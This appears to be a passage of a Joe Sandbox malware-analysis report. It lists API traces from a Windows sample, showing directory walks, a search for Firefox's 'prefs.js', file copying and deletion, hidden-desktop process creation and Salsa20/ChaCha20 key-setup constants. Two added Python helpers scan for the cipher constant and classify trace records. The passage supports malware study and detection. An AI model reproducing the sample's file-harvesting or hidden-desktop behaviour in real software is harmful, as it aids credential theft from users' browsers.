                                              • StrCmpCA.SHLWAPI(?,00420FB0), ref: 00414851
                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 004148DB
                                              • FindClose.KERNEL32(000000FF), ref: 004148F0
                                              • lstrcatA.KERNEL32(?,02C9ED50,?,00000104), ref: 00414915
                                              • lstrcatA.KERNEL32(?,02CA6130), ref: 00414928
                                              • lstrlenA.KERNEL32(?), ref: 00414935
                                              • lstrlenA.KERNEL32(?), ref: 00414946
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Find$FileHeaplstrcatlstrlen$AllocCloseFirstNextProcesswsprintf
                                              • String ID: %s\%s$%s\*
                                              • API String ID: 13328894-2848263008
                                              • Opcode ID: 69dcb7b57205299e4e353f4ff5e3bd6fee26fba3a9fd294cee8ca8b6e7cecfcb
                                              • Instruction ID: 4add3c5e25650dce6a2d7e09fe25a02d5f48076a238705849ce39c3d90be09a7
                                              • Opcode Fuzzy Hash: 69dcb7b57205299e4e353f4ff5e3bd6fee26fba3a9fd294cee8ca8b6e7cecfcb
                                              • Instruction Fuzzy Hash: 145187B1944218ABCB20EB70DC89FEE737DAB58300F40459EB64996190EB74EBC4CF95
                                              APIs
                                              • wsprintfA.USER32 ref: 04854DE3
                                              • FindFirstFileA.KERNEL32(?,?), ref: 04854DFA
                                              • StrCmpCA.SHLWAPI(?,00420FC4), ref: 04854E28
                                              • StrCmpCA.SHLWAPI(?,00420FC8), ref: 04854E3E
                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 04855034
                                              • FindClose.KERNEL32(000000FF), ref: 04855049
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Find$File$CloseFirstNextwsprintf
                                              • String ID:
                                              • API String ID: 180737720-0
                                              • Opcode ID: fcb2fc1512f1b2bfff4d459872b36b8889449b0cd5417e01b30465ecde3626f1
                                              • Instruction ID: 1333aa46677de88df3ee80a24a39f59546f7b49b2ae5ccddabba177bfd363ac2
                                              • Opcode Fuzzy Hash: fcb2fc1512f1b2bfff4d459872b36b8889449b0cd5417e01b30465ecde3626f1
                                              • Instruction Fuzzy Hash: 17616671D00218ABDB24EBA4DD48FEA737DAF48705F404689BA09D6090FB75AB84CF91
                                              APIs
                                              • memset.MSVCRT ref: 00409E47
                                                • Part of subcall function 00418CF0: GetSystemTime.KERNEL32(?,02CA08F8,004205B6,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418D16
                                              • wsprintfA.USER32 ref: 00409E7F
                                              • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 00409EA3
                                              • CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 00409ECC
                                              • memset.MSVCRT ref: 00409EED
                                              • lstrcatA.KERNEL32(00000000,?), ref: 00409F03
                                              • lstrcatA.KERNEL32(00000000,?), ref: 00409F17
                                              • lstrcatA.KERNEL32(00000000,004212D8), ref: 00409F29
                                              • memset.MSVCRT ref: 00409F3D
                                              • lstrcpy.KERNEL32(?,00000000), ref: 00409F7C
                                              • memset.MSVCRT ref: 00409F9C
                                              • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,00000044,00000000), ref: 0040A004
                                              • Sleep.KERNEL32(00001388), ref: 0040A013
                                              • CloseDesktop.USER32(00000000), ref: 0040A060
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: memset$Desktoplstrcat$Create$CloseOpenProcessSleepSystemTimelstrcpywsprintf
                                              • String ID: D
                                              • API String ID: 1347862506-2746444292
                                              • Opcode ID: a10202c694136cf4b08f8315fe38596f638a8bb39b3ba1580b4dfb3a89c0cba5
                                              • Instruction ID: 9351db1e319cd03a78e50f41365f33c4a7b54471eb3ec1f6bde0cae738676000
                                              • Opcode Fuzzy Hash: a10202c694136cf4b08f8315fe38596f638a8bb39b3ba1580b4dfb3a89c0cba5
                                              • Instruction Fuzzy Hash: B551B3B1D04318ABDB20DF60DC4AFDA7778AB48704F004599F60DAA2D1EB75AB84CF55
                                              APIs
                                              • wsprintfA.USER32 ref: 00414113
                                              • FindFirstFileA.KERNEL32(?,?), ref: 0041412A
                                              • StrCmpCA.SHLWAPI(?,00420F94), ref: 00414158
                                              • StrCmpCA.SHLWAPI(?,00420F98), ref: 0041416E
                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 004142BC
                                              • FindClose.KERNEL32(000000FF), ref: 004142D1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Find$File$CloseFirstNextwsprintf
                                              • String ID: %s\%s
                                              • API String ID: 180737720-4073750446
                                              • Opcode ID: 9d44ee2d1d3302ed3f560bb1c24b0dbad1817cb41e0c40033f90fa3194e93cf6
                                              • Instruction ID: fabef74ebea8da44b501a85f582971371f90885c40acf49b74ac124388ccf1e1
                                              • Opcode Fuzzy Hash: 9d44ee2d1d3302ed3f560bb1c24b0dbad1817cb41e0c40033f90fa3194e93cf6
                                              • Instruction Fuzzy Hash: 745179B1904118ABCB24EBB0DD45EEA737DBB58304F4045DEB60996090EB74ABC5CF59
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 04854A37
                                              • RtlAllocateHeap.NTDLL(00000000), ref: 04854A3E
                                              • wsprintfA.USER32 ref: 04854A5D
                                              • FindFirstFileA.KERNEL32(?,?), ref: 04854A74
                                              • StrCmpCA.SHLWAPI(?,00420FAC), ref: 04854AA2
                                              • StrCmpCA.SHLWAPI(?,00420FB0), ref: 04854AB8
                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 04854B42
                                              • FindClose.KERNEL32(000000FF), ref: 04854B57
                                              • lstrcat.KERNEL32(?,006D6F24), ref: 04854B7C
                                              • lstrcat.KERNEL32(?,006D6C2C), ref: 04854B8F
                                              • lstrlen.KERNEL32(?), ref: 04854B9C
                                              • lstrlen.KERNEL32(?), ref: 04854BAD
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                              • String ID:
                                              • API String ID: 671575355-0
                                              • Opcode ID: 40b38b74226c8604f7a13fd3e1b0225e2dd82a7444d87f96db159f9eec02a11e
                                              • Instruction ID: 92e43ff97f737020111f6010c389e9f336ac723d4cafc64ecd46fdff6bb0ff4b
                                              • Opcode Fuzzy Hash: 40b38b74226c8604f7a13fd3e1b0225e2dd82a7444d87f96db159f9eec02a11e
                                              • Instruction Fuzzy Hash: 3E519571940218ABDB64EB74DC88FED737DAB58700F404B8AB649D2090EB74ABC4CF52
                                              APIs
                                              • wsprintfA.USER32 ref: 0485437A
                                              • FindFirstFileA.KERNEL32(?,?), ref: 04854391
                                              • StrCmpCA.SHLWAPI(?,00420F94), ref: 048543BF
                                              • StrCmpCA.SHLWAPI(?,00420F98), ref: 048543D5
                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 04854523
                                              • FindClose.KERNEL32(000000FF), ref: 04854538
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Find$File$CloseFirstNextwsprintf
                                              • String ID:
                                              • API String ID: 180737720-0
                                              • Opcode ID: ac94dde27fa3a8b2d1992181d9aeba8d94f37141b24e2c59e50ce182db00ab73
                                              • Instruction ID: 901725686dac14a73333c449b8e34f4d33bb61dbf5bc201875f00340ebca11ca
                                              • Opcode Fuzzy Hash: ac94dde27fa3a8b2d1992181d9aeba8d94f37141b24e2c59e50ce182db00ab73
                                              • Instruction Fuzzy Hash: B751B7B1904218ABDB24EB74DD84FEA737CBB54304F404BC9B649D2050EBB5AB88CF51
                                              APIs
                                              • wsprintfA.USER32 ref: 0040EE3E
                                              • FindFirstFileA.KERNEL32(?,?), ref: 0040EE55
                                              • StrCmpCA.SHLWAPI(?,00421630), ref: 0040EEAB
                                              • StrCmpCA.SHLWAPI(?,00421634), ref: 0040EEC1
                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0040F3AE
                                              • FindClose.KERNEL32(000000FF), ref: 0040F3C3
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Find$File$CloseFirstNextwsprintf
                                              • String ID: %s\*.*
                                              • API String ID: 180737720-1013718255
                                              • Opcode ID: 44e4519d460c571b6f7c13e0b12cc26d697540730552fd87f4480f32e4084b77
                                              • Instruction ID: d58f243a0e81953373eaf00141ed8e3e8bc28467f540fc5aad09a1a01b74b281
                                              • Opcode Fuzzy Hash: 44e4519d460c571b6f7c13e0b12cc26d697540730552fd87f4480f32e4084b77
                                              • Instruction Fuzzy Hash: 79E16371A121189ADB14FB61DC62EEE7339AF50314F4045EEB10A62092EF386BD9CF59
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: 2-by$2-by$2-byexpa$expa$expa$expand 3$expand 32-by$nd 3$nd 32-by$te k$te k$te k$te knd 3expand 32-by
                                              • API String ID: 0-1562099544
                                              • Opcode ID: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                                              • Instruction ID: 6662a63ba0b3be70bce2e54dd30bd0664bdb013d324eab704435fe0c4fc740cb
                                              • Opcode Fuzzy Hash: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                                              • Instruction Fuzzy Hash: C4E276B09083808FD7A4CF29C580B8BFBE1BFC8354F51892EE99997211D770A959CF56
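The string fragments in the record above ("expa", "nd 3", "2-by", "te k" and their concatenations) are the four 32-bit words of the Salsa20/ChaCha20 key-setup constant "expand 32-byte k" (sigma, the 256-bit-key variant; "expand 16-byte k", tau, is the 128-bit one). Compiled key setup normally stores them as four separate dword immediates, which is why the report lists pieces rather than one contiguous string, and why a plain string search for the whole constant misses this function. The scanner below is an added example, not code from the Joe Sandbox report or from the sample: SAMPLE_DUMP is a constructed byte string standing in for a code region, and REPORT_FRAGMENTS is copied from the String ID field above. Finding the constant shows that a Salsa20/ChaCha20 key setup is present in the unpacked region; it does not by itself say what that cipher protects.

```python
"""Locate Salsa20/ChaCha20 key-setup constants in a memory dump, both as a
contiguous string and as four separate dword immediates.

Added example; not code from the Joe Sandbox report or from the sample.
SAMPLE_DUMP is constructed for this example; REPORT_FRAGMENTS is the
report's own String ID list for the function in the 0x04840000 region.
"""
import re

SIGMA = b"expand 32-byte k"   # Salsa20/ChaCha20 constant for 256-bit keys
TAU = b"expand 16-byte k"     # same, for 128-bit keys
KNOWN = (SIGMA, TAU)

# Constructed stand-in for a code region: four `mov dword [ebp-x], imm32`
# encodings carrying sigma one word at a time, then a contiguous copy of tau.
SAMPLE_DUMP = (
    b"\x00" * 8
    + b"\xc7\x45\xf0" + b"expa"
    + b"\xc7\x45\xf4" + b"nd 3"
    + b"\xc7\x45\xf8" + b"2-by"
    + b"\xc7\x45\xfc" + b"te k"
    + b"\x90" * 16
    + TAU
    + b"\x00" * 8
)

# Fragments exactly as listed in the report's "String ID" field (split on '$').
REPORT_FRAGMENTS = ("2-by$2-by$2-byexpa$expa$expa$expand 3$expand 32-by$nd 3"
                    "$nd 32-by$te k$te k$te k$te knd 3expand 32-by").split("$")


def words(const):
    """The four 32-bit words of a 16-byte constant, as byte strings."""
    return [const[i:i + 4] for i in range(0, 16, 4)]


def find_whole(blob, const):
    """Offsets of contiguous copies of `const` in `blob`."""
    return [m.start() for m in re.finditer(re.escape(const), blob)]


def find_split_words(blob, const, window=64):
    """Offsets of the first word of `const` whose other three words also occur
    within `window` bytes, in any order (the immediate-operand form).

    Bytes that belong to a contiguous copy of any known constant are ignored,
    so tau's 'expa' / 'te k' words are not mistaken for sigma words."""
    covered = set()
    for known in KNOWN:
        for off in find_whole(blob, known):
            covered.update(range(off, off + 16))
    positions = {}
    for w in words(const):
        positions[w] = [m.start() for m in re.finditer(re.escape(w), blob)
                        if m.start() not in covered]
    first, *rest = words(const)
    hits = []
    for p0 in positions[first]:
        if all(any(abs(p - p0) <= window for p in positions[w]) for w in rest):
            hits.append(p0)
    return hits


def scan(blob):
    """Both forms of every known constant, keyed by constant name."""
    return {
        name: {"whole": find_whole(blob, c), "split": find_split_words(blob, c)}
        for name, c in (("sigma", SIGMA), ("tau", TAU))
    }


def fragments_cover(fragments, const):
    """True if every 4-byte word of `const` appears among the listed string
    fragments, which is how a constant held in four immediates surfaces in a
    string dump such as the report's String ID field."""
    return all(any(w.decode() in f for f in fragments) for w in words(const))


if __name__ == "__main__":
    print(scan(SAMPLE_DUMP))
    print("report fragments cover sigma:", fragments_cover(REPORT_FRAGMENTS, SIGMA))
```

Run over a dumped region (for example the 0x04840000 .sdmp referenced in the record), `scan()` reports a split sigma hit at the key-setup routine even when no contiguous copy exists; `fragments_cover()` applies the same test to the report's own string list and confirms that the listed pieces account for all four words of sigma and not of tau.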
                                              APIs
                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00420C32), ref: 0040DF5E
                                              • StrCmpCA.SHLWAPI(?,004215C0), ref: 0040DFAE
                                              • StrCmpCA.SHLWAPI(?,004215C4), ref: 0040DFC4
                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0040E4E0
                                              • FindClose.KERNEL32(000000FF), ref: 0040E4F2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                              • String ID: 4@$\*.*
                                              • API String ID: 2325840235-1993203227
                                              • Opcode ID: 3cdc3bc1ca4623dd4ab3a98770b64da100480c73e045b6562c069503d68560b6
                                              • Instruction ID: 5b1d21d8256b1a4f75019a03d5e94b0e3f490a8b44af3c5bb40891ece502d815
                                              • Opcode Fuzzy Hash: 3cdc3bc1ca4623dd4ab3a98770b64da100480c73e045b6562c069503d68560b6
                                              • Instruction Fuzzy Hash: F6F14D71A151189ACB25EB61DCA5EEE7339AF14314F4005EFB10A62091EF387BD8CF5A
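Most records in this section share one API sequence: wsprintfA building a "%s\*" search pattern, FindFirstFileA, two StrCmpCA calls against string literals that sit 4 bytes apart, a "%s\%s" join for the recursive descent, then FindNextFileA and FindClose. The Python below is an added example, not part of the Joe Sandbox report: it parses trace lines in this export format and flags records that match that sequence, which is the quickest way to separate the file-system walkers from the rest when a report contains dozens of near-identical functions. The sample text is copied from records above (a 0x400000 walker, its 0x04840000 counterpart with its "Part of subcall" lines, and the desktop-creation function as a negative case). Reading the two adjacent string literals as "." and ".." is the author's assumption; the report shows only their addresses.

```python
"""Parse Joe Sandbox "APIs" trace lines and flag the recursive directory-walk
pattern.  Added example, not part of the report; SAMPLE is copied from trace
records in the report, and the '.'/'..' reading of the two adjacent string
literals is an assumption."""
import re
from dataclasses import dataclass
from typing import List, Optional

# One trace line: optional bullet, optional "Part of subcall function XXXXXXXX:",
# api.module, optional (args), then "ref: XXXXXXXX".
_CALL = re.compile(
    r"^\s*(?:•\s*)?(?:Part of subcall function (?P<parent>[0-9A-F]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)

SAMPLE = """\
APIs
• wsprintfA.USER32 ref: 00414113
• FindFirstFileA.KERNEL32(?,?), ref: 0041412A
• StrCmpCA.SHLWAPI(?,00420F94), ref: 00414158
• StrCmpCA.SHLWAPI(?,00420F98), ref: 0041416E
• FindNextFileA.KERNEL32(000000FF,?), ref: 004142BC
• FindClose.KERNEL32(000000FF), ref: 004142D1
Strings
APIs
  • Part of subcall function 0485ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0485ACFF
• FindFirstFileA.KERNEL32(00000000,?,00420B32,00420B2F,00000000,?,?,?,00421450,00420B2E), ref: 0484C12C
• StrCmpCA.SHLWAPI(?,00421454), ref: 0484C19A
• StrCmpCA.SHLWAPI(?,00421458), ref: 0484C1B0
• FindNextFileA.KERNEL32(000000FF,?), ref: 0484CB10
• FindClose.KERNEL32(000000FF), ref: 0484CB22
APIs
• memset.MSVCRT ref: 00409E47
• OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 00409EA3
• CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 00409ECC
• CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,00000044,00000000), ref: 0040A004
• Sleep.KERNEL32(00001388), ref: 0040A013
• CloseDesktop.USER32(00000000), ref: 0040A060
"""


@dataclass
class Call:
    api: str
    module: str
    args: List[str]
    ref: int                    # call-site address from "ref:"
    subcall_of: Optional[int]   # parent address for "Part of subcall" lines


def parse_calls(text):
    """One Call per trace line; lines that are not calls are skipped."""
    calls = []
    for line in text.splitlines():
        m = _CALL.match(line)
        if not m:
            continue
        args = [a for a in (m.group("args") or "").split(",") if a]
        parent = m.group("parent")
        calls.append(Call(m.group("api"), m.group("module"), args,
                          int(m.group("ref"), 16),
                          int(parent, 16) if parent else None))
    return calls


def split_records(text):
    """Per-function chunks, split at each 'APIs' header line."""
    return [c for c in re.split(r"^\s*APIs\s*$", text, flags=re.M) if c.strip()]


def is_directory_walk(calls):
    """FindFirstFileA/FindNextFileA/FindClose in the function's own calls plus
    two StrCmpCA compares against literals 4 bytes apart ('.' and '..', assumed)."""
    own = [c for c in calls if c.subcall_of is None]
    if not {"FindFirstFileA", "FindNextFileA", "FindClose"} <= {c.api for c in own}:
        return False
    targets = sorted(int(c.args[1], 16) for c in own
                     if c.api == "StrCmpCA" and len(c.args) == 2 and c.args[1] != "?")
    return any(b - a == 4 for a, b in zip(targets, targets[1:]))


def classify(text):
    """Map each record, keyed by the ref of its first own call, to the verdict."""
    result = {}
    for rec in split_records(text):
        calls = parse_calls(rec)
        own = [c for c in calls if c.subcall_of is None]
        if own:
            result[own[0].ref] = is_directory_walk(calls)
    return result


if __name__ == "__main__":
    for ref, walk in classify(SAMPLE).items():
        print(f"{ref:08X}  directory walk: {walk}")
```

Paste any run of "APIs" records from the report into `SAMPLE` (or read the export from a file) and `classify()` returns one verdict per function; the subcall lines are parsed but deliberately excluded from the verdict so that a path-building helper called from a walker does not make the helper itself look like one.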
                                              APIs
                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                                • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                                • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004216B0,00420D97), ref: 0040F81E
                                              • StrCmpCA.SHLWAPI(?,004216B4), ref: 0040F86F
                                              • StrCmpCA.SHLWAPI(?,004216B8), ref: 0040F885
                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0040FBB1
                                              • FindClose.KERNEL32(000000FF), ref: 0040FBC3
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                              • String ID: prefs.js
                                              • API String ID: 3334442632-3783873740
                                              • Opcode ID: fa97d7417b00e0ed7db09385c6ddcfeec11e37439937ba94b1fa1e1cdc91277e
                                              • Instruction ID: 41002e5bbb8aa5eaa1de2a73ae7baa64e6dc855d43d68c47d205a656f8df75cd
                                              • Opcode Fuzzy Hash: fa97d7417b00e0ed7db09385c6ddcfeec11e37439937ba94b1fa1e1cdc91277e
                                              • Instruction Fuzzy Hash: 84B19371A011089BCB24FF61DC96FEE7379AF54304F0045AEA50A57191EF386B98CF9A
                                              APIs
                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00425244,?,00401F6C,?,004252EC,?,?,00000000,?,00000000), ref: 00401963
                                              • StrCmpCA.SHLWAPI(?,00425394), ref: 004019B3
                                              • StrCmpCA.SHLWAPI(?,0042543C), ref: 004019C9
                                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00401D80
                                              • DeleteFileA.KERNEL32(00000000), ref: 00401E0A
                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00401E60
                                              • FindClose.KERNEL32(000000FF), ref: 00401E72
                                                • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                                • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                                • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                              • String ID: \*.*
                                              • API String ID: 1415058207-1173974218
                                              • Opcode ID: 15f4b34df85bfc17be5ad473dee7c45c6665dc634d808535e379f0e4dc2031a1
                                              • Instruction ID: a576ed9f26fd673c6d53a896fc8188a2a0655e62510251b9f9068b5a07b58df1
                                              • Opcode Fuzzy Hash: 15f4b34df85bfc17be5ad473dee7c45c6665dc634d808535e379f0e4dc2031a1
                                              • Instruction Fuzzy Hash: 45125071A111189BCB15FB61DCA6EEE7339AF14314F4045EEB10662091EF386BD8CFA9
                                              APIs
                                              • wsprintfA.USER32 ref: 0484F0A5
                                              • FindFirstFileA.KERNEL32(?,?), ref: 0484F0BC
                                              • StrCmpCA.SHLWAPI(?,00421630), ref: 0484F112
                                              • StrCmpCA.SHLWAPI(?,00421634), ref: 0484F128
                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0484F615
                                              • FindClose.KERNEL32(000000FF), ref: 0484F62A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Find$File$CloseFirstNextwsprintf
                                              • String ID:
                                              • API String ID: 180737720-0
                                              • Opcode ID: 922fd519c71b6af3ccb31eb3f6638551c52bf54377e7cc35e7fa9b6b37ebfbe3
                                              • Instruction ID: 24fe5e8d21fc3edaeeec9822932b052fbb490c8deb5d0831921600375d508643
